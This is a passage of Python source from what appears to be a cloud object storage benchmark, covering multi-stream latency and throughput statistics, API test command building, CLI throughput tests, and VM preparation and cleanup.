for start_time, latency in zip(start_times, latencies)]
last_start_time = max((start_time[0] for start_time in start_times))
first_stop_time = min((stop_time[-1] for stop_time in stop_times))
# Compute how well our synchronization worked
first_start_time = min((start_time[0] for start_time in start_times))
last_stop_time = max((stop_time[-1] for stop_time in stop_times))
start_gap = last_start_time - first_start_time
stop_gap = last_stop_time - first_stop_time
if ((start_gap + stop_gap) / (last_stop_time - first_start_time) <
MULTISTREAM_STREAM_GAP_THRESHOLD):
logging.info(
'First stream started %s seconds before last stream started', start_gap)
logging.info(
'Last stream ended %s seconds after first stream ended', stop_gap)
else:
logging.warning(
'Difference between first and last stream start/end times was %s and '
'%s, which is more than %s of the benchmark time %s.',
start_gap, stop_gap, MULTISTREAM_STREAM_GAP_THRESHOLD,
(last_stop_time - first_start_time))
metadata['stream_gap_above_threshold'] = True
# Find the indexes in each stream where all streams are active,
# following Python's [inclusive, exclusive) index convention.
active_start_indexes = np.full(num_streams, 0)
for index, start_time in enumerate(start_times):
for i in range(len(start_time)):
if start_time[i] >= last_start_time:
active_start_indexes[index] = i
break
active_stop_indexes = np.full(num_streams, min_num_records)
for index, stop_time in enumerate(stop_times):
for i in range(len(stop_time) - 1, -1, -1):
if stop_time[i] <= first_stop_time:
active_stop_indexes[index] = i + 1
break
active_latencies = [
latencies[i][active_start_indexes[i]:active_stop_indexes[i]]
for i in range(num_streams)]
active_sizes = [
sizes[i][active_start_indexes[i]:active_stop_indexes[i]]
for i in range(num_streams)]
all_active_latencies = np.concatenate(active_latencies)
all_active_sizes = np.concatenate(active_sizes)
# Don't publish the full distribution in the metadata because doing
# so might break regexp-based parsers that assume that all metadata
# values are simple Python objects. However, do add an
# 'object_size_B' metadata field even for the full results because
# searching metadata is easier when all records with the same metric
# name have the same set of metadata fields.
distribution_metadata = metadata.copy()
if len(all_sizes) == 1:
distribution_metadata['object_size_B'] = all_sizes[0]
else:
distribution_metadata['object_size_B'] = 'distribution'
latency_prefix = 'Multi-stream %s latency' % operation
logging.info('Processing %s multi-stream %s results for the full '
'distribution.', len(all_active_latencies), operation)
_AppendPercentilesToResults(
results,
all_active_latencies,
latency_prefix,
LATENCY_UNIT,
distribution_metadata)
# Publish by-size and full-distribution stats even if there's only
# one size in the distribution, because it simplifies postprocessing
# of results.
for size in all_sizes:
this_size_metadata = metadata.copy()
this_size_metadata['object_size_B'] = size
logging.info('Processing multi-stream %s results for object size %s',
operation, size)
_AppendPercentilesToResults(
results,
all_active_latencies[all_active_sizes == size],
latency_prefix,
LATENCY_UNIT,
this_size_metadata)
# Record samples for individual downloads and uploads if requested.
if FLAGS.record_individual_latency_samples:
for latency in all_active_latencies[all_active_sizes == size]:
results.append(
sample.Sample('%s individual' % latency_prefix, latency,
LATENCY_UNIT, this_size_metadata))
# Build the object latency histogram if user requested it
if FLAGS.object_storage_latency_histogram_interval and any(
size in x for x in sizes):
histogram_interval = FLAGS.object_storage_latency_histogram_interval
hist_latencies = [[l for l, s in zip(*w_l_s) if s == size]
for w_l_s in zip(latencies, sizes)]
max_latency = max([max(l) for l in hist_latencies])
# Note that int() floors for us
num_histogram_buckets = int(max_latency / histogram_interval) + 1
histogram_buckets = [0 for _ in range(num_histogram_buckets)]
for worker_latencies in hist_latencies:
for latency in worker_latencies:
# Note that int() floors for us
histogram_buckets[int(latency / histogram_interval)] += 1
histogram_str = ','.join([str(c) for c in histogram_buckets])
histogram_metadata = this_size_metadata.copy()
histogram_metadata['interval'] = histogram_interval
histogram_metadata['histogram'] = histogram_str
results.append(sample.Sample(
'Multi-stream %s latency histogram' % operation,
0.0, 'histogram', metadata=histogram_metadata))
# Throughput metrics
total_active_times = [np.sum(latency) for latency in active_latencies]
active_durations = [stop_times[i][active_stop_indexes[i] - 1] -
start_times[i][active_start_indexes[i]]
for i in range(num_streams)]
total_active_sizes = [np.sum(size) for size in active_sizes]
# 'net throughput (with gap)' is computed by taking the throughput
# for each stream (total # of bytes transmitted / (stop_time -
# start_time)) and then adding the per-stream throughputs. 'net
# throughput' is the same, but replacing (stop_time - start_time)
# with the sum of all of the operation latencies for that thread, so
# we only divide by the time that stream was actually transmitting.
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput',
np.sum((size / active_time * 8
for size, active_time
in zip(total_active_sizes, total_active_times))),
'bit / second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput (with gap)',
np.sum((size / duration * 8
for size, duration in zip(total_active_sizes, active_durations))),
'bit / second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput (simplified)',
sum([np.sum(size) for size in sizes]) /
(last_stop_time - first_start_time) * 8,
'bit / second', metadata=distribution_metadata))
# QPS metrics
results.append(sample.Sample(
'Multi-stream ' + operation + ' QPS (any stream active)',
num_records / (last_stop_time - first_start_time), 'operation / second',
metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' QPS (all streams active)',
len(all_active_latencies) / (first_stop_time - last_start_time),
'operation / second', metadata=distribution_metadata))
# Statistics about benchmarking overhead
gap_time = sum((active_duration - active_time
for active_duration, active_time
in zip(active_durations, total_active_times)))
results.append(sample.Sample(
'Multi-stream ' + operation + ' total gap time',
gap_time, 'second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' gap time proportion',
gap_time / (first_stop_time - last_start_time) * 100.0,
'percent', metadata=distribution_metadata))
def _DistributionToBackendFormat(dist):
"""Convert an object size distribution to the format needed by the backend.
Args:
dist: a distribution, given as a dictionary mapping size to
frequency. Size will be a string with a quantity and a
unit. Frequency will be a percentage, including a '%'
character. dist may also be a string, in which case it represents
a single object size which applies to 100% of objects.
Returns:
A dictionary giving an object size distribution. Sizes will be
integers representing bytes. Frequencies will be floating-point
numbers in [0,100], representing percentages.
Raises:
ValueError if dist is not a valid distribution.
"""
if isinstance(dist, dict):
val = {flag_util.StringToBytes(size):
flag_util.StringToRawPercent(frequency)
for size, frequency in six.iteritems(dist)}
else:
# We allow compact notation for point distributions. For instance,
# '1KB' is an abbreviation for '{1KB: 100%}'.
val = {flag_util.StringToBytes(dist): 100.0}
# I'm requiring exact addition to 100, which can always be satisfied
# with integer percentages. If we want to allow general decimal
# percentages, all we have to do is replace this equality check with
# approximate equality.
if sum(six.itervalues(val)) != 100.0:
raise ValueError("Frequencies in %s don't add to 100%%!" % dist)
return val
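# Illustrative example (assuming flag_util.StringToBytes treats '1KiB' as
# 1024 bytes): an input of {'1KiB': '90%', '1MiB': '10%'} becomes
# {1024: 90.0, 1048576: 10.0}, and the shorthand '1KiB' alone becomes
# {1024: 100.0}.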
class APIScriptCommandBuilder(object):
"""Builds command lines for the API test script.
Attributes:
test_script_path: the path to the API test script on the remote machine.
storage: the storage provider to use, in the format expected by
the test script.
service: the ObjectStorageService object corresponding to the
storage provider.
"""
def __init__(self, test_script_path, storage, service):
self.test_script_path = test_script_path
self.storage = storage
self.service = service
def BuildCommand(self, args):
"""Build a command string for the API test script.
Args:
args: a list of strings. These will become space-separated
arguments to the test script.
Returns:
A string that can be passed to vm.RemoteCommand.
"""
cmd_parts = [
self.test_script_path,
'--storage_provider=%s' % self.storage
] + args + self.service.APIScriptArgs()
if FLAGS.object_storage_storage_class is not None:
cmd_parts += ['--object_storage_class',
FLAGS.object_storage_storage_class]
return ' '.join(cmd_parts)
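# Hypothetical usage sketch (bucket name and arguments are made up):
#   builder = APIScriptCommandBuilder(test_script_path, 'GCS', service)
#   builder.BuildCommand(['--bucket=my-bucket', '--scenario=OneByteRW'])
# would yield something like
#   '<test_script_path> --storage_provider=GCS --bucket=my-bucket '
#   '--scenario=OneByteRW <service-specific args from APIScriptArgs()>'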
class UnsupportedProviderCommandBuilder(APIScriptCommandBuilder):
"""A dummy command builder for unsupported providers.
When a provider isn't supported by the API test script yet, we
create this command builder for them. It will let us run the CLI
benchmark on that provider, but if the user tries to run an API
benchmark, it will throw an error.
Attributes:
provider: the name of the unsupported provider.
"""
def __init__(self, provider):
self.provider = provider
def BuildCommand(self, args):
raise NotImplementedError('API tests are not supported on provider %s.' %
self.provider)
def OneByteRWBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for small object latency.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
one_byte_rw_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--scenario=OneByteRW'])
_, raw_result = vm.RemoteCommand(one_byte_rw_cmd)
logging.info('OneByteRW raw result is %s', raw_result)
for up_and_down in ([
MultistreamOperationType.upload, MultistreamOperationType.download
]):
search_string = 'One byte %s - (.*)' % up_and_down
result_string = re.findall(search_string, raw_result)
sample_name = ONE_BYTE_LATENCY % up_and_down
if len(result_string) > 0:
_JsonStringToPercentileResults(results,
result_string[0],
sample_name,
LATENCY_UNIT,
metadata)
else:
raise ValueError('Unexpected test outcome from OneByteRW api test: '
'%s.' % raw_result)
def SingleStreamThroughputBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for large object throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
single_stream_throughput_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--scenario=SingleStreamThroughput'])
_, raw_result = vm.RemoteCommand(single_stream_throughput_cmd)
logging.info('SingleStreamThroughput raw result is %s', raw_result)
for up_and_down in [
MultistreamOperationType.upload, MultistreamOperationType.download
]:
search_string = 'Single stream %s throughput in Bps: (.*)' % up_and_down
result_string = re.findall(search_string, raw_result)
sample_name = SINGLE_STREAM_THROUGHPUT % up_and_down
if not result_string:
raise ValueError('Unexpected test outcome from '
'SingleStreamThroughput api test: %s.' % raw_result)
# Convert Bytes per second to Mega bits per second
# We use MB (10^6) to be consistent with network
# bandwidth convention.
result = json.loads(result_string[0])
for percentile in PERCENTILES_LIST:
results.append(sample.Sample(
('%s %s') % (sample_name, percentile),
8 * float(result[percentile]) / 1000 / 1000,
THROUGHPUT_UNIT,
metadata))
def ListConsistencyBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for bucket list consistency.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
list_consistency_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--iterations=%d' % FLAGS.object_storage_list_consistency_iterations,
'--scenario=ListConsistency'])
_, raw_result = vm.RemoteCommand(list_consistency_cmd)
logging.info('ListConsistency raw result is %s', raw_result)
for scenario in LIST_CONSISTENCY_SCENARIOS:
metric_name = '%s %s' % (scenario, LIST_CONSISTENCY_PERCENTAGE)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
if not result_string:
raise ValueError(
'Cannot get percentage from ListConsistency test.')
results.append(sample.Sample(
metric_name,
(float)(result_string[0]),
NA_UNIT,
metadata))
# Parse the list inconsistency window if there is any.
metric_name = '%s %s' % (scenario, LIST_INCONSISTENCY_WINDOW)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
_JsonStringToPercentileResults(results,
result_string[0],
metric_name,
LATENCY_UNIT,
metadata)
# Also report the list latency. These latencies are from the lists
# that were consistent.
metric_name = '%s %s' % (scenario, LIST_LATENCY)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
_JsonStringToPercentileResults(results,
result_string[0],
metric_name,
LATENCY_UNIT,
metadata)
def LoadWorkerOutput(output):
"""Load output from worker processes to our internal format.
Args:
output: list of strings. The stdouts of all worker processes.
Returns:
A tuple of start_time, latency, size. Each of these is a list of
numpy arrays, one array per worker process. start_time[i],
latency[i], and size[i] together form a table giving the start
time, latency, and size (bytes transmitted or received) of all
send/receive operations for worker i.
start_time holds POSIX timestamps, stored as np.float64. latency
holds times in seconds, stored as np.float64. size holds sizes in
bytes, stored as np.int64.
Example:
start_time[i] latency[i] size[i]
------------- ---------- -------
0.0 0.5 100
1.0 0.7 200
2.3 0.3 100
Raises:
AssertionError, if an individual worker's input includes
overlapping operations, or operations that don't move forward in
time, or if the input list isn't in stream number order.
"""
start_times = []
latencies = []
sizes = []
for worker_out in output:
json_out = json.loads(worker_out)
for stream in json_out:
assert len(stream['start_times']) == len(stream['latencies'])
assert len(stream['latencies']) == len(stream['sizes'])
start_times.append(np.asarray(stream['start_times'], dtype=np.float64))
latencies.append(np.asarray(stream['latencies'], dtype=np.float64))
sizes.append(np.asarray(stream['sizes'], dtype=np.int64))
return start_times, latencies, sizes
def _RunMultiStreamProcesses(vms, command_builder, cmd_args, streams_per_vm):
"""Runs all of the multistream read or write processes and doesn't return
until they complete.
Args:
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
cmd_args: arguments for the command_builder.
streams_per_vm: number of threads per vm.
"""
output = [None] * len(vms)
def RunOneProcess(vm_idx):
logging.info('Running on VM %s.', vm_idx)
cmd = command_builder.BuildCommand(cmd_args + [
'--stream_num_start=%s' % (vm_idx * streams_per_vm),
'--vm_id=%s' % vm_idx
])
out, _ = vms[vm_idx].RobustRemoteCommand(cmd, should_log=False)
output[vm_idx] = out
# Each vm/process has a thread managing it.
threads = [
threading.Thread(target=RunOneProcess, args=(vm_idx,))
for vm_idx in range(len(vms))]
for thread in threads:
thread.start()
logging.info('Started %s processes.', len(vms))
# Wait for the threads to finish
for thread in threads:
thread.join()
logging.info('All processes complete.')
return output
def _DatetimeNow():
"""Returns datetime.datetime.now()."""
return datetime.datetime.now()
def _ColdObjectsWrittenFilename():
"""Generates a name for the objects_written_file.
Returns:
The name of the objects_written_file if it should be created, or None.
"""
if FLAGS.object_storage_objects_written_file_prefix:
# Note this format is required by _ColdObjectsWrittenFileAgeHours.
datetime_suffix = _DatetimeNow().strftime('%Y%m%d-%H%M')
return '%s-%s-%s-%s' % (
FLAGS.object_storage_objects_written_file_prefix,
FLAGS.object_storage_region,
uuid.uuid4(), # Add a UUID to support parallel runs that upload data.
datetime_suffix)
return None
def _ColdObjectsWrittenFileAgeHours(filename):
"""Determines the age in hours of an objects_written_file.
Args:
filename: The name of the file.
Returns:
The age of the file in hours (based on the name), or None.
"""
# Parse the year, month, day, hour, and minute from the filename based on the
# way it is written in _ColdObjectsWrittenFilename.
match = re.search(r'(\d\d\d\d)(\d\d)(\d\d)-(\d\d)(\d\d)$', filename)
if not match:
return None
year, month, day, hour, minute = (int(item) for item in match.groups())
write_datetime = datetime.datetime(year, month, day, hour, minute)
write_timedelta = _DatetimeNow() - write_datetime
return write_timedelta.total_seconds() / _SECONDS_PER_HOUR
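# Illustrative example (prefix, region, and UUID are made up): for a file
# named 'my-prefix-us-east1-123e4567-20240101-1200', the trailing
# '20240101-1200' parses to 2024-01-01 12:00, and the returned age is the
# number of hours elapsed since that timestamp.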
def _MultiStreamOneWay(results, metadata, vms, command_builder,
service, bucket_name, operation):
"""Measures multi-stream latency and throughput in one direction.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
    operation: a MultistreamOperationType value: upload, download, delete,
      or bulk_delete.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
objects_written_file = posixpath.join(vm_util.VM_TMP_DIR,
OBJECTS_WRITTEN_FILE)
size_distribution = _DistributionToBackendFormat(
FLAGS.object_storage_object_sizes)
logging.info('Distribution %s, backend format %s.',
FLAGS.object_storage_object_sizes, size_distribution)
streams_per_vm = FLAGS.object_storage_streams_per_vm
num_vms = FLAGS.num_vms
start_time = (
time.time() +
MultiThreadStartDelay(num_vms, streams_per_vm).m_as('second'))
delete_delay = MultiThreadDeleteDelay(num_vms, streams_per_vm)
logging.info('Start time is %s', start_time)
logging.info('Delete delay is %s', delete_delay)
cmd_args = [
'--bucket=%s' % bucket_name,
'--objects_per_stream=%s' % (
FLAGS.object_storage_multistream_objects_per_stream),
'--num_streams=%s' % streams_per_vm,
'--start_time=%s' % start_time,
'--objects_written_file=%s' % objects_written_file]
if operation == MultistreamOperationType.upload:
cmd_args += [
'--object_sizes="%s"' % size_distribution,
'--object_naming_scheme=%s' % FLAGS.object_storage_object_naming_scheme,
'--scenario=MultiStreamWrite']
elif operation == MultistreamOperationType.download:
cmd_args += ['--scenario=MultiStreamRead']
elif operation == MultistreamOperationType.delete:
cmd_args += [
'--scenario=MultiStreamDelete',
'--delete_delay=%s' % delete_delay
]
elif operation == MultistreamOperationType.bulk_delete:
cmd_args += [
'--scenario=MultiStreamDelete', '--bulk_delete=true',
'--delete_delay=%s' % delete_delay
]
else:
    raise Exception('Unknown operation %s; must be one of upload, download, '
                    'delete, or bulk_delete.' % operation.name)
output = _RunMultiStreamProcesses(vms, command_builder, cmd_args,
streams_per_vm)
start_times, latencies, sizes = LoadWorkerOutput(output)
if FLAGS.object_storage_worker_output:
with open(FLAGS.object_storage_worker_output, 'w') as out_file:
out_file.write(json.dumps(output))
_ProcessMultiStreamResults(
start_times,
latencies,
sizes,
operation.name,
list(six.iterkeys(size_distribution)),
results,
metadata=metadata)
# Write the objects written file if the flag is set and this is an upload
objects_written_path_local = _ColdObjectsWrittenFilename()
if operation == MultistreamOperationType.upload and objects_written_path_local is not None:
# Get the objects written from all the VMs
# Note these are JSON lists with the following format:
# [[object1_name, object1_size],[object2_name, object2_size],...]
outs = vm_util.RunThreaded(
lambda vm: vm.RemoteCommand('cat ' + objects_written_file), vms)
maybe_storage_account = ''
maybe_resource_group = ''
if FLAGS.storage == 'Azure':
maybe_storage_account = '"azure_storage_account": "%s", ' % \
service.storage_account.name
maybe_resource_group = '"azure_resource_group": "%s", ' % \
service.resource_group.name
# Merge the objects written from all the VMs into a single string
objects_written_json = \
'{%s%s"bucket_name": "%s", "objects_written": %s}' % \
(maybe_storage_account, maybe_resource_group, bucket_name,
'[' + ','.join([out for out, _ in outs]) + ']')
# Write the file
with open(objects_written_path_local, 'w') as objects_written_file_local:
objects_written_file_local.write(objects_written_json)
def MultiStreamRWBenchmark(results, metadata, vms, command_builder,
service, bucket_name):
"""A benchmark for multi-stream read/write latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream write test on %s VMs.', len(vms))
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.upload)
logging.info('Finished multi-stream write test. Starting '
'multi-stream read test.')
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.download)
logging.info('Finished multi-stream read test.')
def MultiStreamWriteBenchmark(results, metadata, vms, command_builder,
service, bucket_name):
"""A benchmark for multi-stream write latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream write test on %s VMs.', len(vms))
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.upload)
logging.info('Finished multi-stream write test.')
def MultiStreamReadBenchmark(results, metadata, vms, command_builder,
service, bucket_name, read_objects):
"""A benchmark for multi-stream read latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
read_objects: List of lists of [object_name, object_size]. In the outermost
list, each element corresponds to a VM's worker process.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream read test on %s VMs.', len(vms))
assert read_objects is not None, (
'api_multistream_reads scenario requires the '
'object_storage_read_objects_prefix flag to be set.')
# Send over the objects written file
try:
# Write the per-VM objects-written-files
assert len(read_objects) == len(vms), (
'object_storage_read_objects_prefix file specified requires exactly '
'%d VMs, but %d were provisioned.' % (len(read_objects), len(vms)))
for vm, vm_objects_written in zip(vms, read_objects):
# Note that each file is written with a unique name so that parallel runs
# don't overwrite the same local file. They are pushed to the VM to a file
# named OBJECTS_WRITTEN_FILE.
tmp_objects_written_path = os.path.join(vm_util.GetTempDir(),
'%s-%s' % (OBJECTS_WRITTEN_FILE,
vm.name))
with open(tmp_objects_written_path, 'w') as objects_written_file:
objects_written_file.write(json.dumps(vm_objects_written))
vm.PushFile(tmp_objects_written_path,
posixpath.join(vm_util.VM_TMP_DIR, OBJECTS_WRITTEN_FILE))
except Exception as e:
raise Exception('Failed to upload the objects written files to the VMs: '
'%s' % e)
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.download)
logging.info('Finished multi-stream read test.')
def MultiStreamDelete(results, metadata, vms, command_builder, service,
bucket_name):
"""A benchmark for multi-stream delete.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream delete test on %s VMs.', len(vms))
if FLAGS.object_storage_bulk_delete:
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.bulk_delete)
else:
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, MultistreamOperationType.delete)
logging.info('Finished multi-stream delete test.')
def CheckPrerequisites(benchmark_config):
"""Verifies that the required resources are present.
Args:
benchmark_config: Benchmark config to verify.
Raises:
perfkitbenchmarker.data.ResourceNotFound: On missing resource.
perfkitbenchmarker.errors.Setup.InvalidFlagConfigurationError: On invalid
flags.
"""
del benchmark_config
data.ResourcePath(DATA_FILE)
if FLAGS.object_storage_apply_region_suffix_to_bucket_name:
if not FLAGS.object_storage_region:
raise errors.Setup.InvalidFlagConfigurationError(
'Please specify --object_storage_region if using '
'--object_storage_apply_region_suffix_to_bucket_name.')
def _AppendPercentilesToResults(output_results, input_results, metric_name,
metric_unit, metadata):
# PercentileCalculator will (correctly) raise an exception on empty
# input, but an empty input list makes semantic sense here.
if len(input_results) == 0:
return
percentiles = PercentileCalculator(input_results)
for percentile in PERCENTILES_LIST:
output_results.append(sample.Sample(('%s %s') % (metric_name, percentile),
percentiles[percentile],
metric_unit,
metadata))
def CLIThroughputBenchmark(output_results, metadata, vm, command_builder,
service, bucket):
"""A benchmark for CLI tool throughput.
We will upload and download a set of files from/to a local directory
via cli tools and observe the throughput.
Args:
    output_results: the results array to append to.
    metadata: a dictionary of metadata to add to samples.
    vm: the VM to run the benchmark on.
    command_builder: an APIScriptCommandBuilder.
    service: an ObjectStorageService.
    bucket: the primary bucket to benchmark.
Raises:
NotEnoughResultsError: if we failed too many times to upload or download.
"""
data_directory = '/tmp/run/data'
# The real solution to the iteration count issue is dynamically
# choosing the number of iterations based on how long they
# take. This will work for now, though.
if FLAGS.storage == providers.AZURE:
iteration_count = CLI_TEST_ITERATION_COUNT_AZURE
elif FLAGS.cli_test_size == 'normal':
iteration_count = CLI_TEST_ITERATION_COUNT
else:
iteration_count = LARGE_CLI_TEST_ITERATION_COUNT
# The CLI-based tests require some provisioning on the VM first.
vm.RemoteCommand(
'cd /tmp/run/; bash cloud-storage-workload.sh %s' % FLAGS.cli_test_size)
# CLI tool based tests.
cli_upload_results = []
cli_download_results = []
if FLAGS.cli_test_size == 'normal':
data_size_in_mbits = DATA_SIZE_IN_MBITS
file_names = ['file-%s.dat' % i for i in range(100)]
else:
data_size_in_mbits = LARGE_DATA_SIZE_IN_MBITS
file_names = ['file_large_3gib.dat']
for _ in range(iteration_count):
try:
service.EmptyBucket(bucket)
except Exception:
pass
try:
_, res = service.CLIUploadDirectory(vm, data_directory,
file_names, bucket)
except errors.VirtualMachine.RemoteCommandError:
logging.info('failed to upload, skip this iteration.')
continue
throughput = data_size_in_mbits / vm_util.ParseTimeCommandResult(res)
logging.info('cli upload throughput %f', throughput)
cli_upload_results.append(throughput)
try:
vm.RemoveFile(posixpath.join(DOWNLOAD_DIRECTORY, '*'))
except Exception:
pass
try:
_, res = service.CLIDownloadBucket(vm, bucket,
file_names, DOWNLOAD_DIRECTORY)
except errors.VirtualMachine.RemoteCommandError:
logging.info('failed to download, skip this iteration.')
continue
throughput = data_size_in_mbits / vm_util.ParseTimeCommandResult(res)
logging.info('cli download throughput %f', throughput)
cli_download_results.append(throughput)
expected_successes = iteration_count * (1 - CLI_TEST_FAILURE_TOLERANCE)
if (len(cli_download_results) < expected_successes or
len(cli_upload_results) < expected_successes):
raise NotEnoughResultsError('Failed to complete the required number of '
'iterations.')
# Report various percentiles.
metrics_prefix = ''
if FLAGS.cli_test_size != 'normal':
metrics_prefix = '%s ' % FLAGS.cli_test_size
_AppendPercentilesToResults(output_results,
cli_upload_results,
'%s%s' % (metrics_prefix,
UPLOAD_THROUGHPUT_VIA_CLI),
THROUGHPUT_UNIT,
metadata)
_AppendPercentilesToResults(output_results,
cli_download_results,
'%s%s' % (metrics_prefix,
DOWNLOAD_THROUGHPUT_VIA_CLI),
THROUGHPUT_UNIT,
metadata)
def PrepareVM(vm, service):
vm.InstallPackages('python3-pip')
# dependencies of API_TEST_SCRIPT
  # Pip version 20.2.2 is the last version before pip drops support for py3.5
# https://pip.pypa.io/en/stable/news/#id119
vm.RemoteCommand('sudo pip3 install --upgrade "pip<=20.2.2"')
vm.RemoteCommand('sudo pip3 install absl-py')
vm.RemoteCommand('sudo pip3 install pyyaml')
vm.Install('openssl')
  # Prepare data on the VM: create a run directory in the temporary directory
  # and open up its permissions.
vm.RemoteCommand('sudo mkdir -p ' + SCRIPT_DIR)
vm.RemoteCommand('sudo chmod 777 ' + SCRIPT_DIR)
vm.RemoteCommand('sudo mkdir -p ' + DOWNLOAD_DIRECTORY)
vm.RemoteCommand('sudo chmod 777 ' + DOWNLOAD_DIRECTORY)
vm.RemoteCommand('sudo mkdir -p ' + REMOTE_PACKAGE_DIR)
vm.RemoteCommand('sudo chmod 777 ' + REMOTE_PACKAGE_DIR)
file_path = data.ResourcePath(DATA_FILE)
vm.PushFile(file_path, SCRIPT_DIR)
# push the test script
script_path = data.ResourcePath(
os.path.join(API_TEST_SCRIPTS_DIR, API_TEST_SCRIPT))
vm.PushFile(script_path, '/tmp/run/')
# push the package dependencies of the test script
for file_name in API_TEST_SCRIPT_PACKAGE_FILES + service.APIScriptFiles():
path = data.ResourcePath(
os.path.join(API_TEST_SCRIPTS_DIR, file_name))
logging.info('Uploading %s to %s', path, vm)
vm.PushFile(path, REMOTE_PACKAGE_DIR)
service.PrepareVM(vm)
def CleanupVM(vm, service):
service.CleanupVM(vm)
vm.RemoteCommand('/usr/bin/yes | sudo pip3 uninstall absl-py')
vm.RemoteCommand('sudo rm -rf /tmp/run/')
objects_written_file = posixpath.join(vm_util.VM_TMP_DIR,
OBJECTS_WRITTEN_FILE)
vm.RemoteCommand('rm -f %s' % objects_written_file)
def Prepare(benchmark_spec):
"""Prepare vm with cloud provider tool and prepare vm with data file.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Raises:
ColdDataError: If this benchmark is reading cold data, but the data isn't
cold enough (as configured by object_storage_read_objects_min_hours).
"""
  # We always want to clean up server-side state when an exception happens.
benchmark_spec.always_call_cleanup = True
# Load the objects to read file if specified
benchmark_spec.read_objects = None
if FLAGS.object_storage_read_objects_prefix is not None:
    # By taking a glob, we choose an arbitrary file that is old enough, in
    # case there is more than one.
search_prefix = '%s-%s*' % (
FLAGS.object_storage_read_objects_prefix,
FLAGS.object_storage_region)
read_objects_filenames = glob.glob(search_prefix)
logging.info('Considering object files %s*: %s', search_prefix,
read_objects_filenames)
for filename in read_objects_filenames:
age_hours = _ColdObjectsWrittenFileAgeHours(filename)
if age_hours and age_hours > FLAGS.object_storage_read_objects_min_hours:
read_objects_filename = filename
break
else:
raise ColdDataError(
'Object data older than %d hours does not exist. Current cold data '
'files include the following: %s' % (
FLAGS.object_storage_read_objects_min_hours,
read_objects_filenames))
with open(read_objects_filename) as read_objects_file:
# Format of json structure is:
# {"bucket_name": <bucket_name>,
# ... any other provider-specific context needed
# "objects_written": <objects_written_array>}
benchmark_spec.read_objects = json.loads(read_objects_file.read())
benchmark_spec.read_objects_filename = read_objects_filename
benchmark_spec.read_objects_age_hours = age_hours
# When this benchmark reads these files, the data will be deleted. Delete
# the file that specifies the data too.
if not FLAGS.object_storage_dont_delete_bucket:
os.remove(read_objects_filename)
assert benchmark_spec.read_objects is not None, (
'Failed to read the file specified by '
'--object_storage_read_objects_prefix')
# Load the provider and its object storage service
providers.LoadProvider(FLAGS.storage)
# Determine the bucket name.
if benchmark_spec.read_objects is not None:
# Using an existing bucket
bucket_name = benchmark_spec.read_objects['bucket_name']
if FLAGS.object_storage_bucket_name is not None:
logging.warning('--object_storage_bucket_name ignored because '
'--object_storage_read_objects was specified')
else:
# Use a new bucket (or the name of a specified bucket).
